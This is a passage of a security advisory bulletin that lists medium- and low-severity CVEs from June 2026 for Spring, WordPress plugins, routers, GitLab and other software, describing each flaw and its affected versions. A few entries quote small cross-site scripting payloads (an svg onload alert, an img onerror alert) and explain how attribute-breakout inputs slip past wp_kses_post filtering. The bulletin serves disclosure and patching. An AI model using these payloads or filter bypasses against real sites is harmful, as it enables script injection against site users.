| Spring--Spring for Apache Kafka | Spring Kafka's retry topic infrastructure did not sufficiently validate user-controlled header values before acting on them. A producer could send a record with a crafted retry_topic-attempts header to supply an out-of-range attempt count and cause the retry topic router to misidentify where the message was in the retry sequence. Affected versions: Spring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11. | 2026-06-09 | 6.5 | CVE-2026-41727 |
| Spring--Spring Framework | Spring WebFlux applications are vulnerable to Denial of Service (DoS) attacks when processing multipart requests. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.9 | CVE-2026-41840 |
| Spring--Spring Framework | Spring MVC and WebFlux applications are vulnerable to Information Disclosure attacks when resolving static resources. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.9 | CVE-2026-41841 |
| Spring--Spring Framework | Spring MVC and WebFlux applications are vulnerable to Path Traversal attacks when resolving static resources. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.9 | CVE-2026-41843 |
| Spring--Spring Framework | Spring MVC applications which accept user-supplied values in the cssClass, cssErrorClass, or cssStyle attributes of JSP form tags allow arbitrary HTML/JavaScript code injection, potentially resulting in a cross-site scripting (XSS) vulnerability. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.9 | CVE-2026-41846 |
| Spring--Spring Framework | Applications which accept user-supplied Spring Expression Language (SpEL) expressions may be vulnerable to a Denial of Service (DoS) attack if the evaluation of a SpEL expression triggers unbounded cache growth. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.3 | CVE-2026-41851 |
| Spring--Spring Framework | Spring MVC and WebFlux applications are vulnerable to Multipart request smuggling attacks. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 5.3 | CVE-2026-41853 |
| Spring--Spring Framework | IDs for WebSocket sessions in the spring-websocket module are not cryptographically unpredictable, which may be possible to exploit in combination with inadequate authorization rules. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 4.8 | CVE-2026-41838 |
| Spring--Spring Framework | A WebFlux application with a compromised subdomain (for example, compromised via cross-site scripting (XSS)) is vulnerable to an escalation attack exchanging a known session ID for that of an authenticated user. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 4.2 | CVE-2026-41839 |
| Spring--Spring Framework | A Spring MVC or Spring WebFlux application which configures a mapping for "/**" where the view name is not explicitly specified allows an attacker to craft a link resulting in a 302 redirect to an arbitrary external host via the redirect: prefix. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 4.2 | CVE-2026-41844 |
| Spring--Spring Framework | Spring WebFlux applications may be vulnerable to a security bypass when using the Kotlin Router DSL. Affected versions: Spring Framework 5.3.0 through 5.3.48. | 2026-06-09 | 4.8 | CVE-2026-41847 |
| Spring--Spring Framework | Due to incorrect host parsing, applications that rely on UriComponentsBuilder to parse and validate an externally provided URL string may be exposed to a server-side request forgery (SSRF) attack. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18. | 2026-06-09 | 4.2 | CVE-2026-41854 |
| Spring--Spring REST Docs | When using spring-restdocs-webtestclient or spring-restdocs-restassured to document a remote API accessed over HTTP, an attacker who compromises the API or tricks the user into documenting a malicious API can perform an XXE injection attack when the documentation-generating tests are next executed. Affected versions: Spring REST Docs 4.0.0; 3.0.0 through 3.0.5; 2.0.0.RELEASE through 2.0.8.RELEASE. | 2026-06-09 | 5.9 | CVE-2026-40991 |
| Spring--Spring Retry | An attacker can craft a large number of unique requests that trigger a failure, exhausting the capacity of the application-wide stateful retry cache. Once the cache is full, it permanently rejects any further updates, causing all later stateful retries and circuit breakers in the application to fail. Affected versions: Spring Retry 2.0.0 through 2.0.12; 1.3.0 through 1.3.4. | 2026-06-09 | 5.9 | CVE-2026-41710 |
| Spring--Spring Security | Spring Security Authorization Server's authorization endpoint performs insufficient validation of the request_uri parameter. An attacker can craft a malicious authorization request containing an invalid request_uri and an arbitrary, unvalidated redirect_uri, which can lead to an Open Redirect vulnerability. Affected versions: Spring Security 7.0.0 through 7.0.5. Spring Authorization Server 1.5.0 through 1.5.7. | 2026-06-09 | 6.1 | CVE-2026-41008 |
| Spring--Spring Security | Spring Security's CookieRequestCache and CookieServerRequestCache store the pre-authentication request URL in a browser cookie so that users can be redirected back to their intended destination after a successful login. In affected versions, the full absolute URL is stored in the cookie and is used without validation as the post-login redirect target. Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5. | 2026-06-09 | 6.1 | CVE-2026-41706 |
| Spring--Spring Security | SubjectDnX509PrincipalExtractor does not correctly handle certain malformed X.509 certificate CN values, which can lead to reading the wrong value for the username. In a carefully crafted certificate, this can lead to an attacker impersonating another user. Affected versions: Spring Security 5.7.0 through 5.7.24; 5.8.0 through 5.8.26; 6.3.0 through 6.3.17; 6.4.0 through 6.4.17; 6.5.0 through 6.5.10. | 2026-06-09 | 6.8 | CVE-2026-47838 |
| Spring--Spring Web Flow | Applications that configure the WebFlowELExpressionParser are vulnerable to the use of malicious Unified EL expressions. Affected versions: Spring Web Flow 4.0.0; 3.0.0 through 3.0.1; 2.5.0 through 2.5.1. | 2026-06-11 | 6.4 | CVE-2026-40985 |
| Spring--Spring Web Flow | Spring Web Flow's JavaScript RemotingHandler renders the body of an error response as HTML even when the response is not "text/html", which can result in a scripting attack in the user's browser if the error response from the server contains error details with input reflected from an attacker. Affected versions: Spring Web Flow 4.0.0; 3.0.0 through 3.0.1; 2.5.0 through 2.5.1. | 2026-06-11 | 4.8 | CVE-2026-40986 |
| Spring--Spring Web Services | X509AuthenticationProvider could issue a fully authenticated X509AuthenticationToken when a presented certificate mapped to UserDetails, without applying Spring Security's standard account lifecycle checks (disabled, locked, expired, or credentials-expired accounts). Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 5.4 | CVE-2026-40995 |
| Spring--Spring Web Services | Several Spring WS integration paths with Spring Security could surface detailed account state (for example locked or disabled user semantics) to remote SOAP clients through exception messages or callback outcomes, instead of failing with generic authentication errors. That behavior assists remote attackers in distinguishing valid accounts from invalid ones and inferring lifecycle state. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 5.3 | CVE-2026-40997 |
| Spring--Spring Web Services | Wss4jSecurityInterceptor defaulted allowRSA15KeyTransportAlgorithm to true, overriding Apache WSS4J's safer default for validation RequestData. Inbound WS-Security decryption could therefore accept RSA PKCS#1 v1.5 (rsa-1_5) encrypted key material unless operators explicitly reconfigured the flag. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 4.8 | CVE-2026-40996 |
| stefanbohacek--fediverse-embeds-wordpress-plugin | Fediverse Embeds embeds fediverse posts on WordPress sites. Prior to version 1.5.9, Fediverse Embeds registered the unauthenticated AJAX action wp_ajax_nopriv_ftf_get_site_info (includes/Site_Info.php) that verified a nonce ftf-fediverse-embeds-nonce and then called file_get_html($site_url) on the attacker-supplied URL. The same nonce was enqueued onto every public page containing a fediverse embed (via includes/Enqueue_Assets.php lines 41-46 + includes/Helpers.php lines 64-83), so the nonce gate was not an authentication boundary; any visitor of a public post with an embed could grab it and reuse it. This issue has been patched in version 1.5.9. | 2026-06-11 | 5.3 | CVE-2026-46698 |
| steipete--CodexBar | CodexBar before 0.33.0 contains a credential forwarding vulnerability that allows network-adjacent attackers to intercept sensitive credentials by issuing cross-origin or HTTP-downgrade redirects to the shared ProviderHTTPClient transport. Attackers can redirect credentialed provider requests carrying browser cookies, bearer tokens, or API keys to an unintended host, port, or plaintext HTTP destination to capture those credentials. | 2026-06-11 | 5.3 | CVE-2026-49949 |
| steipete--summarize | Summarize before 0.17.0 contains a resource exhaustion vulnerability that allows remote attackers to cause disk exhaustion by serving media responses that bypass the enforced size limit through missing or misreported Content-Length headers, chunked transfer encoding, or failed HEAD requests. Attackers who control a podcast feed or media URL can stream an unbounded response to local storage via the temp-file download path, exhausting disk or system resources on the host running the CLI. | 2026-06-11 | 4.3 | CVE-2026-53781 |
| subzeroid--aiograpi | aiograpi is an asynchronous Instagram API for Python. aiograpi versions before 0.9.10 accepted server-supplied signup challenge paths and used them to build request URLs before validating that the paths were relative Instagram API paths. If an attacker can influence a challenge response, for example through a local network, DNS, or proxy compromise, challenge handling requests could be sent outside the intended Instagram host with the client's existing session headers. Version 0.9.10 validates challenge paths before building URLs, solving captcha challenges, or submitting phone/SMS challenge forms. | 2026-06-11 | 6.5 | CVE-2026-47157 |
| Systerel--S2OPC | Check for certificate revocation only considers the first matching CRL and ignores other valid CRLs of the same CA in the CycloneCrypto cryptographic wrapper of S2OPC library. It might allow connection between an OPC UA client and server using a revoked certificate. | 2026-06-09 | 5.6 | CVE-2026-6899 |
| techjewel--WP GDPR Cookie Consent | The WP GDPR Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ninja_gdpr_ajax_actions' AJAX action in versions up to, and including, 1.0.0. This is due to missing capability and nonce checks on the handleAjaxCalls() function, combined with insufficient input sanitization on the gdprConfig values and missing output escaping in the generateCSS() function which echoes stored configuration values directly into a <style> block rendered on wp_head. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8977 |
| TemplateHouse--Soledad | Missing Authorization vulnerability in TemplateHouse Soledad allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Soledad: from n/a through 8.2.5. | 2026-06-11 | 5.4 | CVE-2022-42479 |
| Tenda--AC15 | A weakness has been identified in Tenda AC15 15.03.05.19. The impacted element is an unknown function of the file /etc_ro/smb.conf of the component Samba. Executing a manipulation can lead to weak password requirements. The attack is only possible within the local network. A high complexity level is associated with this attack. The exploitability is regarded as difficult. The exploit has been made available to the public and could be used for attacks. | 2026-06-08 | 5 | CVE-2026-11493 |
| ThemeHunk--Contact Form & Lead Form Elementor Builder | Missing Authorization vulnerability in ThemeHunk Contact Form & Lead Form Elementor Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Contact Form & Lead Form Elementor Builder: from n/a through 1.8.4. | 2026-06-11 | 5.4 | CVE-2023-25969 |
| tierrainnovation--AJAX Report Comments | The AJAX Report Comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.4. This is due to missing or incorrect nonce validation on the rc_options_page function. This makes it possible for unauthenticated attackers to modify plugin settings including link text and markup, success/failure/already-reported messages, comment threshold, cookie duration, reporter-comment toggle, and notification email address, subject, and message body via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 4.3 | CVE-2026-8902 |
| tigroumeow--Meow Gallery | The Meow Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the REST API endpoint /wp-json/meow-gallery/v1/save_shortcode in all versions up to, and including, 5.4.4 This makes it possible for authenticated attackers, with Author-level access and above, to arbitrarily create or overwrite existing gallery shortcode records by supplying a user-controlled id value. The endpoint performs database update operations without verifying that the requesting user is authorized to modify the referenced gallery record or create their own. | 2026-06-13 | 4.3 | CVE-2026-1291 |
| tmux--tmux | A security vulnerability has been detected in tmux up to 3.6a. Affected is the function image_free of the file image.c. Such manipulation leads to use after free. Local access is required to approach this attack. This attack is characterized by high complexity. The exploitability is told to be difficult. The exploit has been disclosed publicly and may be used. Upgrading to version 3.7-rc is able to address this issue. The name of the patch is fc6d94a9f8a593bd8b7031650802084385d4ee03. The affected component should be upgraded. | 2026-06-09 | 4.5 | CVE-2026-11623 |
| TOTOLINK--AC1200 T8 | A security vulnerability has been detected in TOTOLINK AC1200 T8 4.1.5cu.8611. This affects an unknown function of the file /etc/vsftpd.conf of the component vsftpd. The manipulation leads to least privilege violation. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 4.3 | CVE-2026-11494 |
| TOTOLINK--CP450 | A vulnerability was determined in TOTOLINK CP450 4.1.0cu.747. This vulnerability affects unknown code of the file /etc/vsftpd.conf of the component vsftpd. This manipulation causes least privilege violation. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 4.3 | CVE-2026-11554 |
| TOTOLINK--EX200 | A security flaw has been discovered in TOTOLINK EX200 4.0.3c.7646. This affects an unknown function of the file /etc/vsftpd.conf of the component vsftpd. The manipulation results in least privilege violation. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-09 | 5.3 | CVE-2026-11620 |
| umbraco--Umbraco-CMS | Umbraco is an ASP.NET CMS. Prior to versions 13.14.0 and 17.4.0, some of the Surface Controllers in the CMS provide to support member related operations fail to validate redirect URLs, making Razor templates that derive 'RedirectUrl' from user-controlled query parameters vulnerable to malicious redirect attacks. This issue has been patched in versions 13.14.0 and 17.4.0. | 2026-06-10 | 5.4 | CVE-2026-46616 |
| umbraco--Umbraco-CMS | Umbraco is an ASP.NET CMS. From version 14.0.0 to before version 17.4.0, authenticated users are able to inject HTML into an input field, which is rendered in the confirmation dialog without proper output encoding. This issue has been patched in version 17.4.0. | 2026-06-10 | 4.6 | CVE-2026-46609 |
| UTT--HiPER 2610G | A vulnerability was found in UTT HiPER 2610G up to 3.0.0-171107. This affects the function strcpy of the file /goform/formNatStaticMap. Performing a manipulation of the argument NatBinds results in buffer overflow. The exploit has been made public and could be used. | 2026-06-08 | 5.5 | CVE-2026-11516 |
| wealcoder--Animation Addons for Elementor GSAP Motion Elementor Addons & Website Templates | The Animation Addons for Elementor - GSAP Powered Elementor Addons & Website Templates plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the multiple parameters in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-10 | 6.4 | CVE-2025-8444 |
| weaverlancegmailcom--jQuery Hover Footnotes | The jQuery Hover Footnotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Footnote Qualifier ('{{...}}' Syntax) in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The attribute-breakout payload (e.g., a double-quote followed by an event handler) contains no angle brackets and therefore bypasses WordPress core's wp_kses_post() filtering, which only strips disallowed HTML tags rather than sanitizing attribute contexts. | 2026-06-09 | 6.4 | CVE-2026-10738 |
| weaverlancegmailcom--jQuery Hover Footnotes | The jQuery Hover Footnotes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the jqFootnotes_options_subpanel function. This makes it possible for unauthenticated attackers to update the plugin's settings with arbitrary values that, because option values such as jqfoot_anchor_open, jqfoot_anchor_close, and jqfoot_title are echoed unescaped into frontend page content, can be chained into persistent Cross-Site Scripting affecting all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation of the CSRF vulnerability can be chained into stored Cross-Site Scripting, as the overwritten option values are persisted via update_option() without sanitization and rendered unescaped on the frontend. | 2026-06-09 | 4.3 | CVE-2026-10553 |
| Weaviate--Weaviate | A vulnerability was identified in Weaviate up to 1.37.7. This vulnerability affects the function validateConfig of the file usecases/auth/authentication/apikey/client.go of the component Static API Key Handler. The manipulation of the argument StaticApiKey leads to authorization bypass. It is possible to initiate the attack remotely. The complexity of an attack is rather high. It is stated that the exploitability is difficult. The exploit is publicly available and might be used. Upgrading to version 1.38.0-rc.0 is able to resolve this issue. The identifier of the patch is 40f2cc32279f0f8a51016c3c6870a2c0c808e6c0. You should upgrade the affected component. | 2026-06-08 | 5 | CVE-2026-11500 |
| WeblateOrg--weblate | Weblate is a web based localization tool. From version 5.15 to before version 2026.6, Weblate's VCS_RESTRICT_PRIVATE did not properly account for some transitional IPv6 ranges, multicast addresses, or some semi-private IPv4 ranges, which allowed some addresses to bypass private range restrictions. This issue has been patched in version 2026.6. | 2026-06-10 | 5.9 | CVE-2026-50127 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 2026.5, Weblate's live search preview renders unit source and context as HTML without escaping. Any contributor whose content reaches those fields stores HTML and CSS that runs inside the authenticated editor of every user who runs a matching search. This issue has been patched in version 2026.5. | 2026-06-10 | 4.6 | CVE-2026-45106 |
| websoudan--MW WP Form | The MW WP Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'memo' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Because the memo value is stored via update_post_meta() rather than wp_insert_post(), WordPress's built-in kses and unfiltered_html protections do not apply, allowing attackers to break out of the textarea element via injected closing tags regardless of role-based content filtering. | 2026-06-10 | 4.4 | CVE-2026-8853 |
| wedevs--User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration | The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the user_subscription_cancel() function in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cancel any user's subscription pack, including administrators. | 2026-06-09 | 4.3 | CVE-2026-4058 |
| weDevs--WooCommerce Conversion Tracking | Cross-Site request forgery (CSRF) vulnerability in weDevs WooCommerce Conversion Tracking allows Cross Site Request Forgery. This issue affects WooCommerce Conversion Tracking: from n/a through 2.0.10. | 2026-06-11 | 4.3 | CVE-2022-47150 |
| WP24--WP24 Domain Check | WordPress Plugin WP24 Domain Check 1.6.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input to the fieldnameDomain parameter. Attackers can inject JavaScript payloads through the plugin settings form at options.php that execute in the browsers of administrators viewing the settings page. | 2026-06-08 | 6.4 | CVE-2021-47984 |
| wpmessiah--Prime Elementor Addons Lightweight Elementor Widgets for Faster Pages | The Prime Elementor Addons - Lightweight Elementor Widgets for Faster Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Widget HTML Tag Settings in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit succeeds even for users without the unfiltered_html capability because the payload (e.g., 'img src=x onerror=alert(document.domain)') contains no HTML angle brackets and therefore passes through Elementor's wp_kses_post() filter unchanged at save time. | 2026-06-09 | 6.4 | CVE-2026-8677 |
| wpzoom--Recipe Card Blocks Lite | The Recipe Card Blocks Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the recipe block's 'summary' and 'notes' attributes in all versions up to, and including, 3.4.13. This is due to the 'WPZOOM_Helpers::deserialize_block_attributes' method converting unicode-encoded sequences back into HTML characters after sanitization has already been applied. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that execute whenever a user accesses the published post or the print view of an injected recipe. | 2026-06-08 | 6.4 | CVE-2026-3011 |
| yamcs--yamcs | Yamcs is a mission control framework. Prior to versions 5.13.0 and 5.12.7, an LDAP injection vulnerability exists in `org.yamcs.security.LdapAuthModule` when constructing search filters. The username parameter is inserted directly into the LDAP filter without proper RFC 4515 escaping. Versions 5.13.0 and 5.12.7 patch the issue. | 2026-06-10 | 4.3 | CVE-2026-42568 |
| YITH--YITH WooCommerce Product Slider Carousel | Cross-Site request forgery (CSRF) vulnerability in YITH YITH WooCommerce Product Slider Carousel allows Cross Site Request Forgery. This issue affects YITH WooCommerce Product Slider Carousel: from n/a through 1.16.0. | 2026-06-11 | 4.6 | CVE-2022-44630 |
| yoanbernabeu--grepai | A vulnerability has been found in yoanbernabeu grepai 0.35.0. This issue affects some unknown processing of the file indexer/chunker.go of the component Qdrant Backend. Such manipulation leads to use of weak hash. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been disclosed to the public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-08 | 4.2 | CVE-2026-11479 |
| Yoast--Yoast Duplicate Post | Yoast Duplicate Post through 4.6 inserts an unescaped post title and permalink into the Classic Editor scheduled republish notice. Attackers can schedule a republish copy with a crafted title to execute script when an administrator views the resulting notice. | 2026-06-10 | 5.4 | CVE-2026-53740 |
| Yoast--Yoast Duplicate Post | Yoast Duplicate Post through 4.6 contains a cross-site request forgery vulnerability in the duplicate_post_dismiss_notice handler, which verifies no nonce or capability. Attackers can trick any authenticated user into sending a request that sets the duplicate_post_show_notice site option, suppressing admin notices network-wide. | 2026-06-10 | 4.3 | CVE-2026-53739 |
| yuluma--FastPicker, an order picker and order management system (oms) for WooCommerce on steroids | The FastPicker, an order picker and order management system (oms) for WooCommerce on steroids plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on the settingsPage function. This makes it possible for unauthenticated attackers to modify the plugin's settings, including toggling the webhook integration and changing the FastPicker and KDZ API URLs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 4.3 | CVE-2026-8904 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. | 2026-06-09 | 3.5 | CVE-2026-48288 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. | 2026-06-09 | 3.5 | CVE-2026-48289 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. In versions up to and including 4.30.0, when `prettyUrls: true` is enabled on `@apostrophecms/file` (a documented SEO feature for serving uploaded files at clean URLs), the public pretty-URL handler builds the upstream URL using the raw `Host` HTTP request header. That URL is then `fetch`'ed and the response body + headers are streamed straight back to the requester. Because `Host` is fully attacker-controlled, an unauthenticated remote attacker can pivot the apostrophe process to issue outbound HTTP requests against any host it can reach on the private network. The path component is constrained to `/uploads/attachments/<cuid>-<slug>.<ext>` (built from a local-DB lookup), which keeps the impact narrow: cross-instance data exfiltration is neutralized by cuid uniqueness, but blind-SSRF residuals remain (network-topology mapping via response-code / timing differences and verbose proxy/WAF 404 body disclosure). As of time of publication, no known patched versions exist. | 2026-06-12 | 3.7 | CVE-2026-53607 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. From 1.15.2 to before 1.16.0, nested objects created by utils.merge() (e.g., config.proxy) are still constructed as plain {} with Object.prototype in their chain. The setProxy() function at lib/adapters/http.js:209-223 reads proxy.username, proxy.password, and proxy.auth without hasOwnProperty checks. When Object.prototype.username is polluted, setProxy() constructs a Proxy-Authorization header with attacker-controlled credentials and injects it into every proxied HTTP request. This vulnerability is fixed in 1.16.0. | 2026-06-11 | 3.7 | CVE-2026-44489 |
| Bolt--CMS | A weakness has been identified in Bolt CMS up to 3.7.5. This vulnerability affects unknown code of the file src/Storage/Field/Type/TextType.php of the component HTML Attribute Handler. Executing a manipulation of the argument style can lead to HTML injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The GitHub repository was archived by the owner and is now read-only. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-06-08 | 3.5 | CVE-2026-11511 |
| CodeAstro--Human Resource Management System | A vulnerability was identified in CodeAstro Human Resource Management System 1.0. Affected by this issue is some unknown functionality of the file /dashboard/add_tod of the component Dashboard Interface. The manipulation of the argument todo_data leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-06-12 | 3.5 | CVE-2026-12129 |
| CodeAstro--Human Resource Management System | A security flaw has been discovered in CodeAstro Human Resource Management System 1.0. This affects an unknown part of the file /Projects/Add_Projects of the component Projects Management Page. The manipulation of the argument protitle results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-12 | 3.5 | CVE-2026-12130 |
| CodeAstro--Human Resource Management System | A vulnerability was identified in CodeAstro Human Resource Management System 1.0. Impacted is an unknown function of the file /notice/All_notice of the component Notice Board Management. Such manipulation of the argument Notice Title with the input <svg onload="alert('Stored XSS Triggered by Ashik Mohamed')"> as part of POST leads to cross site scripting. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-06-08 | 2.4 | CVE-2026-11491 |
| D-Link--DGS-1100-08PD | A vulnerability was identified in D-Link DGS-1100-08PD 1.00.006. This issue affects some unknown processing of the file /etc/boa.conf of the component Web Interface. Such manipulation leads to least privilege violation. The attack may be launched remotely. The attack requires a high level of complexity. The exploitability is assessed as difficult. The exploit is publicly available and might be used. | 2026-06-08 | 3.7 | CVE-2026-11555 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.25.0, SanitizeFilePath in pkg/utils/utils.go validated that a path stayed under a safe directory by calling strings.HasPrefix(path, safedir). This is a lexical check, not a directory boundary check: /packages-extra/evil starts with /packages, so it passed. The function did not enforce a path-separator boundary, so any sibling directory whose name began with the safe-directory string was accepted. Callers included the builder's Clean handler (pkg/builder/builder.go:208) and the fetcher's Fetch / Upload handlers (pkg/fetcher/fetcher.go). A tenant who could pre-create or control a sibling directory under the fetcher / builder's shared volume could induce a write or read outside the intended safe directory. This issue has been patched in version 1.25.0. | 2026-06-10 | 3.6 | CVE-2026-50568 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.0 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user to access confidential issue details due to incorrect authorization checks. | 2026-06-11 | 3.1 | CVE-2026-3553 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.9 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to hide changes from merge request diff views due to improper input handling of file names. | 2026-06-11 | 3.7 | CVE-2026-6976 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.9 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions, could have allowed an unauthenticated user to impersonate the GitLab Support Bot and inject arbitrary content via a specially crafted Service Desk email reply due to improper neutralization in email template processing. | 2026-06-11 | 2.6 | CVE-2026-9694 |
| Groww--Stock, Mutual Fund, Gold App | A vulnerability was identified in Groww Stock, Mutual Fund, Gold App up to 20260805 on Android. This affects an unknown part of the component WebView URL Handler. The manipulation leads to improper authorization in handler for custom url scheme. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure. | 2026-06-12 | 1.8 | CVE-2026-12065 |
| Huawei--HarmonyOS | Permission control vulnerability in service notifications. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 3.6 | CVE-2026-41974 |
| Huawei--HarmonyOS | Logic bypass vulnerability in the file system. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 2.4 | CVE-2026-41986 |
| imvks786--student_management_system | A vulnerability was detected in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected by this issue is some unknown functionality of the file /add.php. The manipulation of the argument name/address/fname results in cross site scripting. It is possible to launch the attack remotely. The exploit is now public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 3.5 | CVE-2026-11534 |
